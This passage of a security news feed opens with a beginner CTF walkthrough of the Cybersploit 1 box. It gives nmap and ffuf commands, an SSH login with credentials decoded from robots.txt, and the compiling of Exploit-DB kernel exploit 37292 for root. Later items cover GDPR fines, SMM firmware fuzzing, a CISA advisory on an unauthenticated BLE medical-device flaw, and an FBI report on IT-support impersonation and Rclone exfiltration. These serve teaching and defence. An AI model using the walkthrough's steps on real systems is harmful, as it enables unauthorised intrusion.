<link>https://tsecurity.de/de/3556664/hacking/cybersploit-1-walkthrough-offsec-beginner-guide-screenshots/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556664/hacking/cybersploit-1-walkthrough-offsec-beginner-guide-screenshots/</guid>
<pubDate>Fri, 29 May 2026 11:35:29 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Cybersploit 1 Walkthrough — OffSec | Beginner Guide &amp; Screenshots</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*zf3qwgqHK-aFmGpQT5G37g.jpeg"></figure><p>I’m a professional penetration tester with hands-on red-team experience and OSCP-style practice. I treat every engagement — even CTF boxes — with the same discipline: methodical reconnaissance, prioritized attack paths, and clean, reproducible exploitation. I’m passionate about improving my craft and sharing practical knowledge that helps others learn faster.</p><p><strong><em>Introduction</em></strong></p><p>This Cybersploit1 walkthrough walks through the exact steps I took to compromise the machine: reconnaissance, web enumeration, credential discovery, SSH access, and local privilege escalation. You’ll find the precise commands I used, why I used them, annotated screenshots for verification, and short post-exploit checks — presented so beginners can follow and experienced testers can reproduce.</p><p><strong><em>Reconnaissance</em></strong></p><p>I started with a simple Nmap scan to identify open ports and services:</p><pre>nmap -sC -sV -p- - min-rat 1000 192.168.122.92</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/845/1*SSzNEcEeUAneWBVUVQyKLA.png"></figure><p>The scan showed two open services: HTTP on port 80 and SSH on port 22. I opened the HTTP service in a browser and saw a simple web page.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/864/1*ipUgKwdwRzzmSMV4PWrc2Q.png"></figure><p>The site’s UI had non-functional tabs, so the next step was to view the page source.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hYelqeEP6iTwuIS3XWXSkw.png"></figure><p>At the bottom of the HTML I found a hint: a username itsskv. I saved that — likely an SSH username.</p><p><strong><em>Web enumeration</em></strong></p><p>I used a directory fuzzing tool to find hidden files and directories. I prefer it ffuf because it’s fast and flexible:</p><pre>ffuf -u http://192.168.122.92/FUZZ -w /usr/share/wordlists/dirb/common.txt -t 50 -mc 200</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1009/1*4hX9l8DjQQ1HobK75FEn1A.png"></figure><p>From the discovered directories I inspected /hacker and found an image and a robots.txt entry. The robots.txt contained a suspicious hash string</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/1*SN7mM9ABkDiJXA-P2SiaOw.png"></figure><p>To decode the hash, I used CyberChef (or any base64 decoder). After trying different decodings, it turned out to be <strong>Base64</strong>, which revealed the password for the itsskv user.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*M2iB5-Tvfa7hoB8x_nVz2Q.png"></figure><p><strong>Why CyberChef?</strong> CyberChef is an interactive tool that lets you quickly try common encodings/transforms (Base64, hex, rot, gzip, etc.) without guessing blindly.</p><p><strong><em>Initial access — SSH</em></strong></p><p>With itsskv and the decoded password, I SSHed to the machine:</p><pre>ssh itsskv@192.168.120.92</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*32fmPvmKeKm-a4Ajh5zVmg.png"></figure><p>After logging in, I checked the home directory and found local.txt and flag2.txt. local.txt contained a flag string; flag2.txt said “Your flag is in another file...” (typical CTF hint).</p><pre>ls -la<br>cat local.txt<br>cat flag2.txt<br>uname -a<br>cat /etc/issue</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*iDpxkGDzyCC_Od3BnNrtsA.png"></figure><p>After that, I did basic enumeration</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1003/1*nrln226vnbh9iqLoG7FR6A.png"></figure><p>This shows an old Linux kernel: <strong>3.13.0–32</strong> on Ubuntu 12.04 LTS — important because old kernels often have local privilege escalation vulnerabilities.</p><p><strong>Kernel vulnerabilities — choosing an exploit</strong></p><p>Common kernel LPEs against kernels in this family include:</p><ul><li><strong>OverlayFS local root</strong> (CVE-2015–1328) — affects certain kernel versions and configurations.</li><li><strong>Dirty COW</strong> (CVE-2016–5195) — widely exploited against older kernels.</li></ul><p>I searched Exploit-DB and found an exploit (ID <strong>37292</strong>) that targets a vulnerability applicable to this kernel. Link (for your notes): <a href="https://www.exploit-db.com/exploits/37292.">https://www.exploit-db.com/exploits/37292.</a></p><blockquote><strong><em>Note:</em></strong><em> Always verify whether an exploit is suitable for the exact kernel and architecture (i386 vs x86_64). Misapplying an exploit can crash the box.</em></blockquote><p><strong><em>Preparing the exploit on the target</em></strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Pz_TmCpZO44gE9qNvLcsuQ.png"></figure><p>The target system lacked network utilities like wget/curl, so I copied the exploit code manually: I opened nano 37292.c on the target and pasted the C source into a file.</p><p>Commands I used to inspect and prepare the file:</p><pre>ls -l 37292.c<br>head -n 20 37292.c   # show the first 20 lines to confirm it's the expected C source</pre><p>Why ls -l and head -n?</p><p>ls -l shows file size and permissions so you can confirm the file was saved and is the expected size.</p><p>head -n 20 quickly inspects the top of the file to confirm it contains C source (includes, function signatures) before compiling.</p><pre>gcc 37292.c -o  expoilt<br>chmod +x expoilt</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pLso46qXMM_vorZrOOQj5g.png"></figure><p><strong>Why </strong><strong>gcc 37292.c -o exploit?</strong></p><ul><li>gcc is the GNU C Compiler. -o exploit names the output binary exploit (instead of default a.out), which keeps things tidy and obvious.</li><li>Compiling on the target ensures the binary is built for the target architecture and libc, avoiding cross-architecture problems.</li></ul><p>Then I made it executable and ran it:</p><pre>chmod +x exploit<br>./exploit</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/997/1*d8LhPITR7cIDAiTxYPQI9A.png"></figure><p>After a short wait, I switched to the elevated root shell:</p><h3>Post-exploit validation and notes</h3><ul><li>I validated privileged access by listing /root and reading proof.txt. This confirms local privilege escalation success.</li><li>Avoid leaving any artifacts on real systems. For CTFs, this is fine, but on real engagements, you must clean up and follow the rules of engagement.</li></ul><h3>Lessons learned / takeaways</h3><ol><li>Start small: scan (Nmap) and follow high-value paths (web → creds → SSH).</li><li>Inspect page source &amp; fuzz directories (HTML comments, robots.txt).</li><li>Check kernel/arch (uname -a) before chasing LPEs; compile exploits on-target if needed.</li><li>Validate exploits and always follow rules of engagement.</li></ol><p>Thank you for reading!!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=25b56fbf759b" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/cybersploit-1-walkthrough-offsec-beginner-guide-screenshots-25b56fbf759b">Cybersploit 1 Walkthrough — OffSec | Beginner Guide &amp; Screenshots</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GDPR set the tone for regulatory action — and the AI fine pushback to come]]></title>
<description><![CDATA[Big tech firms continue to push back against fines levied for alleged violations of European data protection law, in what could be a harbinger for AI regulations to come.



While lawyers and experts quizzed by CSO broadly argue that big tech firms contesting data protection rules isn’t a particu...]]></description>
<link>https://tsecurity.de/de/3556330/it-security-nachrichten/gdpr-set-the-tone-for-regulatory-action-and-the-ai-fine-pushback-to-come/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556330/it-security-nachrichten/gdpr-set-the-tone-for-regulatory-action-and-the-ai-fine-pushback-to-come/</guid>
<pubDate>Fri, 29 May 2026 09:07:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Big tech firms continue to push back against fines levied for alleged violations of European data protection law, in what could be a harbinger for AI regulations to come.</p>



<p>While lawyers and experts quizzed by CSO broadly argue that big tech firms contesting data protection rules isn’t a particular cause for concern, the more widespread introduction of AI technologies is a far greater data protection challenge on the horizon.</p>



<p>The EU’s <a href="https://www.csoonline.com/article/562107/general-data-protection-regulation-gdpr-requirements-deadlines-and-facts.html">General Data Protection Regulation (GDPR)</a> came into force eight years ago this week. Over those eight years, European regulators announced an estimated €7.1 billion in GDPR fines but nearly 40%, around €2.8 billion, has either already been annulled or is under active legal challenge, according to analysis by insurance brokerage Alliance Risk.</p>



<p>Fines that have already been annulled include one against Amazon at €746 million (Luxembourg, March 2026) and another versus OpenAI at €15 million (Italy, March 2026). Those under active appeal include three fines against Meta (€1.2 billion, €265 million, and €91 million) and one against TikTok (€530 million).</p>



<p>Alliance Risk used CMS Law GDPR Enforcement Tracker as its primary source for information on GDPR enforcement, cross-referenced against IAPP enforcement data and trackers from Kiteworks and UniConsent. Data on annulments came from reported court decisions.</p>



<h2 class="wp-block-heading">GDPR established a benchmark for breach notification</h2>



<p>According to Alliance Risk, GDPR successfully laid the foundation for data protection law globally — particularly by first establishing the 72-hour breach notification standard.</p>



<p>This three-day notification rule is law in six jurisdictions — EU, UK, Thailand, Kenya, Nigeria, and South Korea — and influential elsewhere. For example, the US CIRCIA rule for critical infrastructure, which is pending final rule publication this month, is due to apply the 72-hour standard.</p>



<p>By comparison, HIPAA gives US healthcare organisations 60 days as a breach notification deadline. The SEC gives public companies four business days but only after they’ve internally determined a breach is “material,” which adds its own delay.</p>



<p>Although the breach notification regulations established by GDPR have been a success, issues with the enforcement of rules remain.</p>



<p>“The framework has structural weaknesses that large companies have learned to exploit in court, and nearly 40% of announced fines reflect that,” according to Alliance Risk.</p>



<p>The <a href="https://www.csoonline.com/article/1258597/how-the-eu-ai-act-regulates-artificial-intelligence-and-what-it-means-for-cybersecurity.html">EU’s AI Act</a> reaches full application in August, and the European Commission is already proposing to reform GDPR through the Digital Omnibus. “The framework is being rewritten while it’s still being tested,” Alliance Risk concludes.</p>



<p>“The fact that around 40% of GDPR fines by value are under challenge isn’t necessarily a sign the system is broken,” Nick Phillips, an intellectual property lawyer at Edwin Coe LLP tells CSO. “Eight years in, the bigger fines were always going to end up in court, and the rulings that come out of those appeals are starting to give in-house teams something they’ve never really had before: practical guidance on what regulators can and can’t defend.”</p>



<p>Phillips argues that achieving compliance with GDPR has improved enterprise security maturity because of the 72-hour breach notification rule coupled with the obligation to record all breaches and to notify data subjects combined with the need to improve security controls even more than the threat of a fine for non-compliance.</p>



<p>“That breach notification regime has arguably been the single biggest factor in forcing organisations to put proper incident response in place, get forensics providers on retainer, and start reporting breaches up to the board,” Phillips says. “A lot of that simply wasn’t happening before 2018, and it’s the part of GDPR that’s done the most work.”</p>



<p>Marco Eggerling, LL.M, security and trust officer EMEA and Asia, at robotic process automation vendor UiPath, says it would be a “mistake to read these annulments as courts clearing big tech.”</p>



<p>“In the Amazon case, the Luxembourg court upheld the substance of the violations and sent the matter back to the regulator,” Eggerling notes. “The fine fell because the authority skipped required steps, not because the conduct was found lawful.”</p>



<p>Eggerling adds: “The lesson for regulators is to build procedurally bulletproof decisions. The lesson for companies is that the underlying obligations have not moved an inch.”</p>



<p>Even within the EU there is a disparity in how regulations are understood and applied, making cross-border decisions about data and AI challenging.</p>



<p>“A lot of organisations lean towards the ‘lowest common denominator’ and adhere to the strictest governance and more conservative approaches in order to avoid the wrath of regulators,” says Caroline Carruthers, CEO and founder of global data consultancy Carruthers and Jackson.</p>



<p>The UK and EU apply stricter regulations than the US or China, so many organisations adhere to the stricter rules wherever they operate.</p>



<p>Due to their size and nature, “big tech” organisations tend to have a heightened appetite for risk and a desire to push the boundaries of regulations — and often a different relationship with the general public, whose data is the business model. “They have a vested interest in deregulation and so will naturally be the most likely to contest enforcement,” Carruthers notes.</p>



<h2 class="wp-block-heading">Data regulations need to evolve with the advent of AI</h2>



<p>For most organisations, the enforcement of GDPR has gotten to a place where it is broadly fit-for-purpose, according to Carruthers.</p>



<p>“When GDPR was first introduced, the guidance was unclear and inconsistent,” Carruthers explains. “It felt legally robust, but a lot of the data practitioners struggled to make it work. Even now, some businesses tell us that they are ‘paralysed’ a little by GDPR. They are highly fearful of data and the associated regulation, to the extent that they are unable to maximise — or even touch on — the potential power of data.”</p>



<p>However, as AI and data regulation evolves, there’s a need to account for how these tools are now being used.</p>



<p>The concern is that history may repeat itself as regulation looks to keep pace with technological change. “There is a risk that organisations get stuck in a mid-maturity plateau in which innovation is halted by complex and inconsistent interpretations of regulations,” Carruthers warns.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat Europe 2025 | Unveiling System Management Mode Memory Corruption Vulnerability Via Fuzzing]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 1x - Views:8 System Management Mode (SMM) is an operating mode introduced by the x86 processor to handle critical hardware events and chipset errors. SMM applications, designed to run in this mode, operate at a high privilege level (known as Ring -2, which is even h...]]></description>
<link>https://tsecurity.de/de/3555723/it-security-video/black-hat-europe-2025-unveiling-system-management-mode-memory-corruption-vulnerability-via-fuzzing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555723/it-security-video/black-hat-europe-2025-unveiling-system-management-mode-memory-corruption-vulnerability-via-fuzzing/</guid>
<pubDate>Fri, 29 May 2026 01:17:33 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 1x - Views:8 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/OXxSc4-sn9Q?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>System Management Mode (SMM) is an operating mode introduced by the x86 processor to handle critical hardware events and chipset errors. SMM applications, designed to run in this mode, operate at a high privilege level (known as Ring -2, which is even higher than the kernel mode, Ring 0). With the high privilege, SMM applications have almost unlimited access to system resources. However, vendors commonly adopt memory-unsafe programming languages, such as C and C++, to develop SMM applications, making them prone to memory corruption vulnerabilities. Once compromised, the attacker may gain complete control over the system. This intrinsic feature makes SMM applications a very attractive target for attackers.<br />
<br />
While SMM applications play a crucial role in the foundation of low-level system software, applying efficient and effective fuzzing to them is a very challenging and complex task. In this talk, we present the first systematic SMM application fuzzing framework specifically designed to detect memory corruption vulnerabilities in closed-source SMM applications. We observe that the SMM application, as part of the UEFI firmware, is supposed to run in a UEFI runtime environment. Without such an environment, SMM applications cannot be correctly initialized and executed. As such, we will present all the technical details related to an all-in-one solution for SMM application fuzzing. Our framework offers a fully featured UEFI runtime environment. With such an environment, we ensure that fuzzing does not result in early crashes and a high number of false positives. Additionally, we present the details behind a universal fuzzing harness for successful fuzzing campaigns. The fuzzing harness contains an interface grouping and a memory access interception mechanism to infer the input semantics, such that it can explore the deep logic of SMM applications. Our framework has already proven its impact: in our experiments, we identified a total of 38 new vulnerabilities in firmware from nine well-known vendors. We will share the technical insights behind these discoveries and walk through several real-world case studies that highlight the power and versatility of our approach.<br />
<br />
By: Jianqiang Wang  |  Dr.-Ing., Max Planck Institute for Security and Privacy<br />
<br />
https://blackhat.com/eu-25/briefings/schedule/index.html#breaking-ring--2-unveiling-system-management-mode-memory-corruption-vulnerability-via-fuzzing-48091<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fourth Frontier Frontier X Mobile Application, Frontier X2]]></title>
<description><![CDATA[View CSAF
Summary
Successful exploitation of this vulnerability could allow an attacker to read and write arbitrary handle values and change clinical readings, which could result in taking control of the device and lead to patient harm.
The following versions of Fourth Frontier Frontier X Mobile ...]]></description>
<link>https://tsecurity.de/de/3554945/it-security-nachrichten/fourth-frontier-frontier-x-mobile-application-frontier-x2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554945/it-security-nachrichten/fourth-frontier-frontier-x-mobile-application-frontier-x2/</guid>
<pubDate>Thu, 28 May 2026 18:37:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsma-26-148-01.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Successful exploitation of this vulnerability could allow an attacker to read and write arbitrary handle values and change clinical readings, which could result in taking control of the device and lead to patient harm.</strong></p>
<p>The following versions of Fourth Frontier Frontier X Mobile Application, Frontier X2 are affected:</p>
<ul>
<li>Frontier X Android application vers&lt;v15.0.0</li>
<li>Frontier X IOS application vers&lt;v25.0.0</li>
<li>Frontier X2 vers:all/*</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 8.8</td>
<td>Fourth Frontier</td>
<td>Fourth Frontier Frontier X Mobile Application, Frontier X2</td>
<td>Missing Authentication for Critical Function</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Healthcare and Public Health</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>United States</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-5768</a></h3>
<div class="csaf-accordion-content">
<p>The Frontier X2 device allows unauthenticated BLE read/write access to critical GATT characteristics without enforcing pairing authentication or authorization. This allows attackers within BLE range to perform unauthorized control of device functions, including starting/stopping activities, triggering vibrations, causing denial-of-service conditions, and fuzzing characteristic values to induce unexpected behavior. Additionally, the Frontier X mobile application lacks proper BLE device authentication, allowing attackers to impersonate a legitimate Frontier X2 device and connect to the application. By cloning BLE advertisements and exposing expected GATT characteristics, attackers can manipulate activity states and inject fabricated health telemetry such as breathing rate, heart rate, strain, and other health-related data into the mobile application.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-5768">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Fourth Frontier Frontier X Mobile Application, Frontier X2</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Fourth Frontier</div>
<div class="ics-version"><strong>Product Version:</strong><br>Fourth Frontier Frontier X Android application: &lt;v15.0.0, Fourth Frontier Frontier X IOS application: &lt;v25.0.0, Fourth Frontier Frontier X2: vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Fourth Frontier is aware of the vulnerability and is working on a fix. Users are encouraged to reach out to Fourth Frontier directly for assistance. https://fourthfrontier.com/pages/contact-usl.<br><a href="https://fourthfrontier.com/pages/contact-us">https://fourthfrontier.com/pages/contact-us</a></p>
<p><strong>Mitigation</strong><br>Frontier X/X2 devices can connect to only one app at a time; users should first connect the Frontier X/X2 device using the Frontier X app and then start the activity.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/306.html">CWE-306 Missing Authentication for Critical Function</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Shakir Zari and Jerin Sunny reported this vulnerability to CISA</li>
</ul>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability.</p>
<p>Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolating them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.</p>
<p>Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<p>No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.</p>
<hr>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-05-28</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-05-28</td>
<td>1</td>
<td>Initial Publication</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[Surviving a LockBit Ransomware Attack: The ROI of Visibility | UpGuard]]></title>
<description><![CDATA[Read how veteran CISO Nick Gicinto saved his alma mater from a LockBit ransomware attack by discarding the standard playbook.]]></description>
<link>https://tsecurity.de/de/3554937/it-security-nachrichten/surviving-a-lockbit-ransomware-attack-the-roi-of-visibility-upguard/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554937/it-security-nachrichten/surviving-a-lockbit-ransomware-attack-the-roi-of-visibility-upguard/</guid>
<pubDate>Thu, 28 May 2026 18:37:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Read how veteran CISO Nick Gicinto saved his alma mater from a LockBit ransomware attack by discarding the standard playbook.]]></content:encoded>
</item>
<item>
<title><![CDATA[Employees are unknowingly inviting tech support impersonators into firms, says FBI]]></title>
<description><![CDATA[Online or telephone IT support scams have been tricking employees into downloading or clicking on malware for years. But according to the FBI, one group that targets US-based law firms has recently found success in person, by convincing firms to allow a supposed IT support person into the buildin...]]></description>
<link>https://tsecurity.de/de/3552744/it-security-nachrichten/employees-are-unknowingly-inviting-tech-support-impersonators-into-firms-says-fbi/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552744/it-security-nachrichten/employees-are-unknowingly-inviting-tech-support-impersonators-into-firms-says-fbi/</guid>
<pubDate>Thu, 28 May 2026 03:07:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Online or telephone IT support scams have been tricking employees into downloading or clicking on malware for years. But according to the FBI, one group that targets US-based law firms has recently found success in person, by convincing firms to allow a supposed IT support person into the building, where they insert a storage device into a victim’s computer and install malware or steal data.</p>



<p>This revelation comes from <a href="https://www.ic3.gov/CSA/2026/260526.pdf" target="_blank" rel="noreferrer noopener">an FBI Flash report this week</a> describing the activities of a gang it calls The Silent Ransom Group (SRG). Other researchers call it <a href="https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/" target="_blank" rel="noreferrer noopener">Luna Moth</a>, <a href="https://www.crowdstrike.com/en-us/adversaries/chatty-spider/" target="_blank" rel="noreferrer noopener">Chatty Spider </a>and UNC3753.</p>



<p>Cybersecurity experts, though, aren’t surprised that employees can be fooled into allowing a stranger to touch their computers.</p>



<p>“The adversary visiting a location in person with a USB key hacking device of some sort has been used for decades, particularly in the banking industry,” said <a href="https://blog.knowbe4.com/author/roger-grimes" target="_blank" rel="noreferrer noopener">Roger Grimes</a>, CISO advisor at KnowBe4. </p>



<p>“Usually, it isn’t just a direct download of data, but using the USB storage drive to either monitor password typing, to install remote access software that the hacker can use to come back into the environment remotely, or to install some other sort of hacker malware. It’s so common in the banking industry that they have often added and allowed that scenario — a physical attacker — in their regular penetration testing audits, more so than any other industry.”</p>



<p><a href="https://www.sans.org/profiles/lance-spitzner" target="_blank" rel="noreferrer noopener">Lance Spitzner</a>, director of workforce cybersecurity training at the SANS Institute, said the tactic of getting into a company to use infected USB drives isn’t new, but in his opinion is relatively rare. It’s more common for a threat actor to mail a drive to an employee.</p>



<p>“Having someone physically expose themselves by going into an organization is a risk most cyber attackers are not willing to take,” he said. “The details in the FBI report are pretty limited; I’m guessing if this did happen, an attacker paid someone off to do it for them, perhaps an insider or contractor the company trusted.”</p>



<p>The FBI says SRG actors have been running data theft and extortion operations since at least 2022. Despite its name, the gang doesn’t use ransomware encryption, but typically seeks rapid access to victim systems to steal data. Then they use extortion, through threats of public disclosure or sale of stolen data, to try to get payments. </p>



<p>Historically, the gang gained access to the victim’s network by sending phishing emails purportedly charging small ‘subscription fees;’ to cancel the fake subscription, the victim was instructed to call the threat actor, who then emailed the victim a link that would download remote access software.</p>



<h2 class="wp-block-heading">New tactic</h2>



<p>But since the spring of this year, SRG actors have added a new tactic: Posing as an employee from the victim’s IT department. They either directly call or send phishing emails to urge employees to contact an SRG actor pretending to be their firm’s IT support. While on the phone, the SRG actor asks the employee to grant access to a remote desktop session. </p>



<p>If that fails, SRG sends a threat actor to the victim’s location to physically access their computer and insert a storage device. The excuse: the so-called IT support person needs to image the device, or to create a backup file to address potential impacts from the phishing email. Once the threat actor obtains access to the victim’s device, they minimally escalate privileges and quickly pivot to data exfiltration without encryption.</p>



<p>Their tools include WinSCP (Windows Secure Copy) or a hidden or renamed version of “Rclone” to exfiltrate data. They may also exfiltrate data to internal file sharing platforms such as Google Drive or Microsoft OneDrive. And once it has the firm’s data, the gang will call employees or clients of a victim company to pressure the victim to begin negotiations.</p>



<p>The FBI warns infosec pros that indicators of an SRG attack may include new, unauthorized downloads of system management or remote access tools, including Zoho Assist, Quick Assist, AnyDesk, RustDesk, Syncro, Splashtop, or Atera; unauthorized installation of external hard drives or USB drives on company computers; exfiltration of data to Microsoft OneDrive, Google Drive, or external servers; WinSCP or Rclone connection made to an external IP address; and alerts that data was exfiltrated from the company environment.</p>



<p>The primary things employees need to be trained to watch for are visits from unidentified or unauthorized individuals claiming to be IT support and attempting to access computers, and unsolicited phone calls from individuals falsely claiming to work in their IT department.</p>



<p>The FBI didn’t respond by press time to a request for information on the number of times the gang had tricked an employee into allowing a personal visit. But the tactic by SRG is new enough that the bureau is asking for a copy of the extortion note, the phone number or email account used by the group, transcripts of communications with the threat actor, and any surveillance videos or photos of individuals posing as IT support.</p>



<h2 class="wp-block-heading">The challenge of security awareness training</h2>



<p>Since the beginning of the desktop computer age, CSOs, CIOs and IT department leaders have struggled to find effective <a href="https://www.csoonline.com/article/4152631/security-awareness-is-not-a-control-rethinking-human-risk-in-enterprise-security.html" target="_blank">security awareness training</a> to fight phishing, IT tech scams, and other social engineering attacks. Law enforcement agencies<a href="https://www.csoonline.com/article/557091/feds-shut-down-tech-support-scammers-freeze-assets.html" target="_blank"> have had some success in taking gangs offline</a>, but they pop up again.</p>



<p>The threat actors may also be assisted by the fact that employees often don’t know who their IT support staff are, especially if the firm uses a third party external support company.</p>



<p><strong>[Related content</strong>: <a href="https://www.csoonline.com/article/3604803/security-awareness-training-topics-best-practices-costs-free-options.html" target="_blank">A backgrounder on security awareness training</a><strong>]</strong></p>



<p><a href="https://www.chriskayserauthor.com/">Christopher Kayser</a>, head of the Canadian firm Cybercrime Analytics and author of the book <em>Cybercrime Through Social Engineering</em>, said in an interview that often an employee’s first assumption is that an email, text, or voicemail about a serious issue from someone claiming to be from IT is legitimate.</p>



<p>After that, threat actors play on an employee’s willingness to act on a supposedly urgent matter, their obedience to management, or their wish to be helpful. “We have a tendency to trust,” he said.</p>



<p>It doesn’t help that threat actors are willing to share successful tactics with other groups, he added. Nor, he said, does it help that in some organizations, security awareness training doesn’t extend to the top (CEOs) or the bottom (receptionists).</p>



<h2 class="wp-block-heading">Trust no one</h2>



<p>To combat IT support scams, employees need to be trained that any email, text, or voicemail purporting to come from IT that asks for action needs to be verified with an IT manager through an approved process, not by replying to the message or calling a phone number given in the suspect communication, Kayser said. Employees also need to be trained to slow down, and not to respond or act quickly on emails, texts, or voicemails that ask for passwords, multifactor authentication codes, or personal information.</p>



